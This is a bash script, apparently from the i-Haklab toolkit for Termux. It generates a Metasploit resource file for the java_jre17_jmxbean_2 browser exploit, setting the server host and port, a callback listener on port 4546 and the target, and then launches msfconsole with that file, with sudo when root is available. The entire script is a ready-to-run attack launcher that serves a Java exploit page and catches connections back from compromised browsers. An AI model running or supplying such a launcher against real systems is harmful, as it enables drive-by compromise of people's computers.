#!/bin/bash
#This file is part of i-Haklab command

if [ -d /data/data/com.termux/files/home/i-Haklab ]; then
        iHAKLAB=/data/data/com.termux/files/home/i-Haklab                                   else
        iHAKLAB=/data/data/com.termux/files/home/storage/external-1/roothome/i-Haklab
fi

source $iHAKLAB/.set/libexec/colors
source $iHAKLAB/.set/var/variables
source $iHAKLAB/.set/functions/functions

until [ -d ~/java/handler/ ]; do
	printf "$R[w]->$W The hanlder box is empty\n"
	exit
done
for i in ${TARGET[*]}; do
	if [ $3 = $i ]; then
		if [ ! -e ~/java/handler/paylink-pc-$3.rc ]; then
                	banner
                        echo "use exploit/multi/browser/java_jre17_jmxbean_2" > ~/java/handler/paylink-pc-$3.rc
                        echo "set SRVHOST $LOCALHOST" >> ~/java/handler/paylink-pc-$3.rc
                        echo "set SRVPORT $LPORT" >> ~/java/handler/paylink-pc-$3.rc
                        echo "set LHOST $LOCALHOST" >> ~/java/handler/paylink-pc-$3.rc
                        echo "set LPORT 4546" >> ~/java/handler/paylink-pc-$3.rc
                        echo "set URIPATH /" >> ~/java/handler/paylink-pc-$3.rc
                        echo "set target $3" >> ~/java/handler/paylink-pc-$3.rc
                        echo "run" >> ~/java/handler/paylink-pc-$3.rc
                        
			if [ $CHECKROOT = "root" ]; then
                                chk-sudo
                                chk-msf
                                printf "$Y[i]->$W Handler file saved as$G paylink-pc-$3.rc$W\n"
                                sleep 1
                                sudo msfconsole -q -r ~/java/handler/paylink-pc-$3.rc
                        else
                               printf "$Y[i]->$W Handler file saved as$G paylink-pc-$3.rc$W\n"
                               sleep 1
			       chk-msf
			       msfconsole -q -r ~/java/handler/paylink-pc-$3.rc
                        fi
                else
			printf "$R[w]->$W File paylink-pc-$3.rc already exist\n"
                fi
        fi
done
